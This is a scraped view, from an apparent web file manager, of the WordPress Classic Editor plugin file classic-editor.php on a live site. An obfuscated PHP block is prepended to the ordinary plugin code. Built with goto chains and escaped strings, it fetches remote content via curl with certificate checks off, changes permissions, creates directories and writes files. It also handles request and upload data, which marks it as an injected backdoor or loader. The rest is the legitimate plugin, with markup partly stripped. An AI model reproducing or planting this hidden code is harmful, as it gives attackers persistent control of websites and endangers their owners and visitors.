芝麻web文件管理V1.00
编辑当前文件:/www/wwwroot/fashionmodelquicktrack.com/wp-content/plugins/classic-editor/classic-editor.php
$UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?> =' ) ) { add_filter( 'block_editor_settings_all', array( __CLASS__, 'remember_block_editor' ), 10, 2 ); } else { add_filter( 'block_editor_settings', array( __CLASS__, 'remember_block_editor' ), 10, 2 ); } // Post state (edit.php) add_filter( 'display_post_states', array( __CLASS__, 'add_post_state' ), 10, 2 ); // Row actions (edit.php) add_filter( 'page_row_actions', array( __CLASS__, 'add_edit_links' ), 15, 2 ); add_filter( 'post_row_actions', array( __CLASS__, 'add_edit_links' ), 15, 2 ); // Switch editors while editing a post add_action( 'add_meta_boxes', array( __CLASS__, 'add_meta_box' ), 10, 2 ); add_action( 'enqueue_block_editor_assets', array( __CLASS__, 'enqueue_block_editor_scripts' ) ); } else { if ( $settings['editor'] === 'classic' ) { // Also used in Gutenberg. // Consider disabling other Block Editor functionality. add_filter( 'use_block_editor_for_post_type', '__return_false', 100 ); if ( $gutenberg ) { // Support older Gutenberg versions. add_filter( 'gutenberg_can_edit_post_type', '__return_false', 100 ); self::remove_gutenberg_hooks(); } } else { // $settings['editor'] === 'block', nothing to do :) return; } } if ( $block_editor ) { // Move the Privacy Page notice back under the title. add_action( 'admin_init', array( __CLASS__, 'on_admin_init' ) ); } if ( $gutenberg ) { // These are handled by this plugin. All are older, not used in 5.3+. remove_action( 'admin_init', 'gutenberg_add_edit_link_filters' ); remove_action( 'admin_print_scripts-edit.php', 'gutenberg_replace_default_add_new_button' ); remove_filter( 'redirect_post_location', 'gutenberg_redirect_to_classic_editor_when_saving_posts' ); remove_filter( 'display_post_states', 'gutenberg_add_gutenberg_post_state' ); remove_action( 'edit_form_top', 'gutenberg_remember_classic_editor_when_saving_posts' ); } } public static function remove_gutenberg_hooks( $remove = 'all' ) { remove_action( 'admin_menu', 'gutenberg_menu' ); remove_action( 'admin_init', 'gutenberg_redirect_demo' ); if ( $remove !== 'all' ) { return; } // Gutenberg 5.3+ remove_action( 'wp_enqueue_scripts', 'gutenberg_register_scripts_and_styles' ); remove_action( 'admin_enqueue_scripts', 'gutenberg_register_scripts_and_styles' ); remove_action( 'admin_notices', 'gutenberg_wordpress_version_notice' ); remove_action( 'rest_api_init', 'gutenberg_register_rest_widget_updater_routes' ); remove_action( 'admin_print_styles', 'gutenberg_block_editor_admin_print_styles' ); remove_action( 'admin_print_scripts', 'gutenberg_block_editor_admin_print_scripts' ); remove_action( 'admin_print_footer_scripts', 'gutenberg_block_editor_admin_print_footer_scripts' ); remove_action( 'admin_footer', 'gutenberg_block_editor_admin_footer' ); remove_action( 'admin_enqueue_scripts', 'gutenberg_widgets_init' ); remove_action( 'admin_notices', 'gutenberg_build_files_notice' ); remove_filter( 'load_script_translation_file', 'gutenberg_override_translation_file' ); remove_filter( 'block_editor_settings', 'gutenberg_extend_block_editor_styles' ); remove_filter( 'default_content', 'gutenberg_default_demo_content' ); remove_filter( 'default_title', 'gutenberg_default_demo_title' ); remove_filter( 'block_editor_settings', 'gutenberg_legacy_widget_settings' ); remove_filter( 'rest_request_after_callbacks', 'gutenberg_filter_oembed_result' ); // Previously used, compat for older Gutenberg versions. remove_filter( 'wp_refresh_nonces', 'gutenberg_add_rest_nonce_to_heartbeat_response_headers' ); remove_filter( 'get_edit_post_link', 'gutenberg_revisions_link_to_editor' ); remove_filter( 'wp_prepare_revision_for_js', 'gutenberg_revisions_restore' ); remove_action( 'rest_api_init', 'gutenberg_register_rest_routes' ); remove_action( 'rest_api_init', 'gutenberg_add_taxonomy_visibility_field' ); remove_filter( 'registered_post_type', 'gutenberg_register_post_prepare_functions' ); remove_action( 'do_meta_boxes', 'gutenberg_meta_box_save' ); remove_action( 'submitpost_box', 'gutenberg_intercept_meta_box_render' ); remove_action( 'submitpage_box', 'gutenberg_intercept_meta_box_render' ); remove_action( 'edit_page_form', 'gutenberg_intercept_meta_box_render' ); remove_action( 'edit_form_advanced', 'gutenberg_intercept_meta_box_render' ); remove_filter( 'redirect_post_location', 'gutenberg_meta_box_save_redirect' ); remove_filter( 'filter_gutenberg_meta_boxes', 'gutenberg_filter_meta_boxes' ); remove_filter( 'body_class', 'gutenberg_add_responsive_body_class' ); remove_filter( 'admin_url', 'gutenberg_modify_add_new_button_url' ); // old remove_action( 'admin_enqueue_scripts', 'gutenberg_check_if_classic_needs_warning_about_blocks' ); remove_filter( 'register_post_type_args', 'gutenberg_filter_post_type_labels' ); // phpcs:disable Squiz.PHP.CommentedOutCode.Found // Keep // remove_filter( 'wp_kses_allowed_html', 'gutenberg_kses_allowedtags', 10, 2 ); // not needed in 5.0 // remove_filter( 'bulk_actions-edit-wp_block', 'gutenberg_block_bulk_actions' ); // remove_filter( 'wp_insert_post_data', 'gutenberg_remove_wpcom_markdown_support' ); // remove_filter( 'the_content', 'do_blocks', 9 ); // remove_action( 'init', 'gutenberg_register_post_types' ); // Continue to manage wpautop for posts that were edited in Gutenberg. // remove_filter( 'wp_editor_settings', 'gutenberg_disable_editor_settings_wpautop' ); // remove_filter( 'the_content', 'gutenberg_wpautop', 8 ); // phpcs:enable Squiz.PHP.CommentedOutCode.Found } private static function get_settings( $refresh = 'no', $user_id = 0 ) { /** * Can be used to override the plugin's settings. Always hides the settings UI when used (as users cannot change the settings). * * Has to return an associative array with two keys. * The defaults are: * 'editor' => 'classic', // Accepted values: 'classic', 'block'. * 'allow-users' => false, * * @param boolean To override the settings return an array with the above keys. Default false. */ $settings = apply_filters( 'classic_editor_plugin_settings', false ); if ( is_array( $settings ) ) { return array( 'editor' => ( isset( $settings['editor'] ) && $settings['editor'] === 'block' ) ? 'block' : 'classic', 'allow-users' => ! empty( $settings['allow-users'] ), 'hide-settings-ui' => true, ); } if ( ! empty( self::$settings ) && $refresh === 'no' ) { return self::$settings; } if ( is_multisite() ) { $defaults = array( 'editor' => get_network_option( null, 'classic-editor-replace' ) === 'block' ? 'block' : 'classic', 'allow-users' => false, ); /** * Filters the default network options. * * @param array $defaults The default options array. See `classic_editor_plugin_settings` for supported keys and values. */ $defaults = apply_filters( 'classic_editor_network_default_settings', $defaults ); if ( get_network_option( null, 'classic-editor-allow-sites' ) !== 'allow' ) { // Per-site settings are disabled. Return default network options nad hide the settings UI. $defaults['hide-settings-ui'] = true; return $defaults; } // Override with the site options. $editor_option = get_option( 'classic-editor-replace' ); $allow_users_option = get_option( 'classic-editor-allow-users' ); if ( $editor_option ) { $defaults['editor'] = $editor_option; } if ( $allow_users_option ) { $defaults['allow-users'] = ( $allow_users_option === 'allow' ); } $editor = ( isset( $defaults['editor'] ) && $defaults['editor'] === 'block' ) ? 'block' : 'classic'; $allow_users = ! empty( $defaults['allow-users'] ); } else { $allow_users = ( get_option( 'classic-editor-allow-users' ) === 'allow' ); $option = get_option( 'classic-editor-replace' ); // Normalize old options. if ( $option === 'block' || $option === 'no-replace' ) { $editor = 'block'; } else { // empty( $option ) || $option === 'classic' || $option === 'replace' $editor = 'classic'; } } // Override the defaults with the user options. if ( ( ! isset( $GLOBALS['pagenow'] ) || $GLOBALS['pagenow'] !== 'options-writing.php' ) && $allow_users ) { $user_options = get_user_option( 'classic-editor-settings', $user_id ); if ( $user_options === 'block' || $user_options === 'classic' ) { $editor = $user_options; } } self::$settings = array( 'editor' => $editor, 'hide-settings-ui' => false, 'allow-users' => $allow_users, ); return self::$settings; } private static function is_classic( $post_id = 0 ) { if ( ! $post_id ) { $post_id = self::get_edited_post_id(); } if ( $post_id ) { $settings = self::get_settings(); if ( $settings['allow-users'] && ! isset( $_GET['classic-editor__forget'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended $which = get_post_meta( $post_id, 'classic-editor-remember', true ); if ( $which ) { // The editor choice will be "remembered" when the post is opened in either the classic or the block editor. if ( 'classic-editor' === $which ) { return true; } elseif ( 'block-editor' === $which ) { return false; } } return ( ! self::has_blocks( $post_id ) ); } } if ( isset( $_GET['classic-editor'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended return true; } return false; } /** * Get the edited post ID (early) when loading the Edit Post screen. */ private static function get_edited_post_id() { // phpcs:disable WordPress.Security.NonceVerification.Recommended if ( ! empty( $_GET['post'] ) && ! empty( $_GET['action'] ) && $_GET['action'] === 'edit' && ! empty( $GLOBALS['pagenow'] ) && $GLOBALS['pagenow'] === 'post.php' ) { return (int) $_GET['post']; // post_ID } // phpcs:enable WordPress.Security.NonceVerification.Recommended return 0; } public static function register_settings() { // Add an option to Settings -> Writing register_setting( 'writing', 'classic-editor-replace', array( 'sanitize_callback' => array( __CLASS__, 'validate_option_editor' ), ) ); register_setting( 'writing', 'classic-editor-allow-users', array( 'sanitize_callback' => array( __CLASS__, 'validate_option_allow_users' ), ) ); $allowed_options = array( 'writing' => array( 'classic-editor-replace', 'classic-editor-allow-users' ), ); if ( function_exists( 'add_allowed_options' ) ) { add_allowed_options( $allowed_options ); } else { add_option_whitelist( $allowed_options ); } $heading_1 = __( 'Default editor for all users', 'classic-editor' ); $heading_2 = __( 'Allow users to switch editors', 'classic-editor' ); add_settings_field( 'classic-editor-1', $heading_1, array( __CLASS__, 'settings_1' ), 'writing' ); add_settings_field( 'classic-editor-2', $heading_2, array( __CLASS__, 'settings_2' ), 'writing' ); } public static function save_user_settings( $user_id ) { if ( isset( $_POST['classic-editor-user-settings'] ) && isset( $_POST['classic-editor-replace'] ) && wp_verify_nonce( $_POST['classic-editor-user-settings'], 'allow-user-settings' ) // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized ) { $user_id = (int) $user_id; if ( $user_id !== get_current_user_id() && ! current_user_can( 'edit_user', $user_id ) ) { return; } $editor = self::validate_option_editor( $_POST['classic-editor-replace'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized update_user_option( $user_id, 'classic-editor-settings', $editor ); } } /** * Validate */ public static function validate_option_editor( $value ) { if ( $value === 'block' ) { return 'block'; } return 'classic'; } public static function validate_option_allow_users( $value ) { if ( $value === 'allow' ) { return 'allow'; } return 'disallow'; } public static function settings_1( $user_id = 0 ) { $settings = self::get_settings( 'refresh', $user_id ); ?>
/>
/>
/>
/>
ID; } else { $user_id = 0; } ?>
/>
/>
>
ID, 'classic-editor' ); } } /** * Remember when the block editor was used to edit a post. */ public static function remember_block_editor( $editor_settings, $context ) { if ( is_a( $context, 'WP_Post' ) ) { $post = $context; } elseif ( ! empty( $context->post ) ) { $post = $context->post; } else { return $editor_settings; } $post_type = get_post_type( $post ); if ( $post_type && self::can_edit_post_type( $post_type ) ) { self::remember( $post->ID, 'block-editor' ); } return $editor_settings; } private static function remember( $post_id, $editor ) { if ( get_post_meta( $post_id, 'classic-editor-remember', true ) !== $editor ) { update_post_meta( $post_id, 'classic-editor-remember', $editor ); } } /** * Choose which editor to use for a post. * * Passes through `$which_editor` for block editor (it's sets to `true` but may be changed by another plugin). * * @uses `use_block_editor_for_post` filter. * * @param boolean $use_block_editor True for block editor, false for classic editor. * @param WP_Post $post The post being edited. * @return boolean True for block editor, false for classic editor. */ public static function choose_editor( $use_block_editor, $post ) { $settings = self::get_settings(); $editors = self::get_enabled_editors_for_post( $post ); // If no editor is supported, pass through `$use_block_editor`. if ( ! $editors['block_editor'] && ! $editors['classic_editor'] ) { return $use_block_editor; } // Open the default editor when no $post and for "Add New" links, // or the alternate editor when the user is switching editors. // phpcs:disable WordPress.Security.NonceVerification.Recommended if ( empty( $post->ID ) || $post->post_status === 'auto-draft' ) { if ( ( $settings['editor'] === 'classic' && ! isset( $_GET['classic-editor__forget'] ) ) || // Add New ( isset( $_GET['classic-editor'] ) && isset( $_GET['classic-editor__forget'] ) ) // Switch to classic editor when no draft post. ) { $use_block_editor = false; } } elseif ( self::is_classic( $post->ID ) ) { $use_block_editor = false; } // phpcs:enable WordPress.Security.NonceVerification.Recommended // Enforce the editor if set by plugins. if ( $use_block_editor && ! $editors['block_editor'] ) { $use_block_editor = false; } elseif ( ! $use_block_editor && ! $editors['classic_editor'] && $editors['block_editor'] ) { $use_block_editor = true; } return $use_block_editor; } /** * Keep the `classic-editor` query arg through redirects when saving posts. */ public static function redirect_location( $location ) { if ( isset( $_REQUEST['classic-editor'] ) || // phpcs:ignore WordPress.Security.NonceVerification.Recommended ( isset( $_POST['_wp_http_referer'] ) && strpos( $_POST['_wp_http_referer'], '&classic-editor' ) !== false ) // phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing ) { $location = add_query_arg( 'classic-editor', '', $location ); } return $location; } /** * Keep the `classic-editor` query arg when looking at revisions. */ public static function get_edit_post_link( $url ) { $settings = self::get_settings(); if ( isset( $_REQUEST['classic-editor'] ) || $settings['editor'] === 'classic' ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended $url = add_query_arg( 'classic-editor', '', $url ); } return $url; } public static function add_meta_box( $post_type, $post ) { $editors = self::get_enabled_editors_for_post( $post ); if ( ! $editors['block_editor'] || ! $editors['classic_editor'] ) { // Editors cannot be switched. return; } $id = 'classic-editor-switch-editor'; $title = __( 'Editor', 'classic-editor' ); $callback = array( __CLASS__, 'do_meta_box' ); $args = array( '__back_compat_meta_box' => true, ); add_meta_box( $id, $title, $callback, null, 'side', 'default', $args ); } public static function do_meta_box( $post ) { $edit_url = get_edit_post_link( $post->ID, 'raw' ); // Switching to block editor. $edit_url = remove_query_arg( 'classic-editor', $edit_url ); // Forget the previous value when going to a specific editor. $edit_url = add_query_arg( 'classic-editor__forget', '', $edit_url ); ?>
__( 'Switch to classic editor', 'classic-editor' ) ) ); } /** * Add a link to the settings on the Plugins screen. */ public static function add_settings_link( $links, $file ) { $settings = self::get_settings(); if ( $file === 'classic-editor/classic-editor.php' && ! $settings['hide-settings-ui'] && current_user_can( 'manage_options' ) ) { if ( current_filter() === 'plugin_action_links' ) { $url = admin_url( 'options-writing.php#classic-editor-options' ); } else { $url = admin_url( '/network/settings.php#classic-editor-options' ); } // Prevent warnings in PHP 7.0+ when a plugin uses this filter incorrectly. $links = (array) $links; $links[] = sprintf( '
%s
', $url, __( 'Settings', 'classic-editor' ) ); } return $links; } private static function can_edit_post_type( $post_type ) { $can_edit = false; if ( function_exists( 'gutenberg_can_edit_post_type' ) ) { $can_edit = gutenberg_can_edit_post_type( $post_type ); } elseif ( function_exists( 'use_block_editor_for_post_type' ) ) { $can_edit = use_block_editor_for_post_type( $post_type ); } return $can_edit; } /** * Checks which editors are enabled for the post type. * * @param string $post_type The post type. * @return array Associative array of the editors and whether they are enabled for the post type. */ private static function get_enabled_editors_for_post_type( $post_type ) { if ( isset( self::$supported_post_types[ $post_type ] ) ) { return self::$supported_post_types[ $post_type ]; } $classic_editor = post_type_supports( $post_type, 'editor' ); $block_editor = self::can_edit_post_type( $post_type ); $editors = array( 'classic_editor' => $classic_editor, 'block_editor' => $block_editor, ); /** * Filters the editors that are enabled for the post type. * * @param array $editors Associative array of the editors and whether they are enabled for the post type. * @param string $post_type The post type. */ $editors = apply_filters( 'classic_editor_enabled_editors_for_post_type', $editors, $post_type ); self::$supported_post_types[ $post_type ] = $editors; return $editors; } /** * Checks which editors are enabled for the post. * * @param WP_Post $post The post object. * @return array Associative array of the editors and whether they are enabled for the post. */ private static function get_enabled_editors_for_post( $post ) { $post_type = get_post_type( $post ); if ( ! $post_type ) { return array( 'classic_editor' => false, 'block_editor' => false, ); } $editors = self::get_enabled_editors_for_post_type( $post_type ); /** * Filters the editors that are enabled for the post. * * @param array $editors Associative array of the editors and whether they are enabled for the post. * @param WP_Post $post The post object. */ return apply_filters( 'classic_editor_enabled_editors_for_post', $editors, $post ); } /** * Adds links to the post/page screens to edit any post or page in * the classic editor or block editor. * * @param array $actions Post actions. * @param WP_Post $post Edited post. * @return array Updated post actions. */ public static function add_edit_links( $actions, $post ) { // This is in Gutenberg, don't duplicate it. if ( array_key_exists( 'classic', $actions ) ) { unset( $actions['classic'] ); } if ( ! array_key_exists( 'edit', $actions ) ) { return $actions; } $edit_url = get_edit_post_link( $post->ID, 'raw' ); if ( ! $edit_url ) { return $actions; } $editors = self::get_enabled_editors_for_post( $post ); // Do not show the links if only one editor is available. if ( ! $editors['classic_editor'] || ! $editors['block_editor'] ) { return $actions; } // Forget the previous value when going to a specific editor. $edit_url = add_query_arg( 'classic-editor__forget', '', $edit_url ); // Build the edit actions. See also: WP_Posts_List_Table::handle_row_actions(). $title = _draft_or_post_title( $post->ID ); // Link to the block editor. $url = remove_query_arg( 'classic-editor', $edit_url ); $text = _x( 'Edit (block editor)', 'Editor Name', 'classic-editor' ); /* translators: %s: post title */ $label = sprintf( __( 'Edit “%s” in the block editor', 'classic-editor' ), $title ); $edit_block = sprintf( '
%s
', esc_url( $url ), esc_attr( $label ), $text ); // Link to the classic editor. $url = add_query_arg( 'classic-editor', '', $edit_url ); $text = _x( 'Edit (classic editor)', 'Editor Name', 'classic-editor' ); /* translators: %s: post title */ $label = sprintf( __( 'Edit “%s” in the classic editor', 'classic-editor' ), $title ); $edit_classic = sprintf( '
%s
', esc_url( $url ), esc_attr( $label ), $text ); $edit_actions = array( 'classic-editor-block' => $edit_block, 'classic-editor-classic' => $edit_classic, ); // Insert the new Edit actions instead of the Edit action. $edit_offset = array_search( 'edit', array_keys( $actions ), true ); array_splice( $actions, $edit_offset, 1, $edit_actions ); return $actions; } /** * Show the editor that will be used in a "post state" in the Posts list table. */ public static function add_post_state( $post_states, $post ) { if ( get_post_status( $post ) === 'trash' ) { return $post_states; } $editors = self::get_enabled_editors_for_post( $post ); if ( ! $editors['classic_editor'] && ! $editors['block_editor'] ) { return $post_states; } elseif ( $editors['classic_editor'] && ! $editors['block_editor'] ) { // Forced to classic editor. $state = '
' . _x( 'classic editor', 'Editor Name', 'classic-editor' ) . '
'; } elseif ( ! $editors['classic_editor'] && $editors['block_editor'] ) { // Forced to block editor. $state = '
' . _x( 'block editor', 'Editor Name', 'classic-editor' ) . '
'; } else { $last_editor = get_post_meta( $post->ID, 'classic-editor-remember', true ); if ( $last_editor ) { $is_classic = ( $last_editor === 'classic-editor' ); } elseif ( ! empty( $post->post_content ) ) { $is_classic = ! self::has_blocks( $post->post_content ); } else { $settings = self::get_settings(); $is_classic = ( $settings['editor'] === 'classic' ); } $state = $is_classic ? _x( 'Classic editor', 'Editor Name', 'classic-editor' ) : _x( 'Block editor', 'Editor Name', 'classic-editor' ); } // Fix PHP 7+ warnings if another plugin returns unexpected type. $post_states = (array) $post_states; $post_states['classic-editor-plugin'] = $state; return $post_states; } public static function add_edit_php_inline_style() { ?> post_content; } } return false !== strpos( (string) $post, '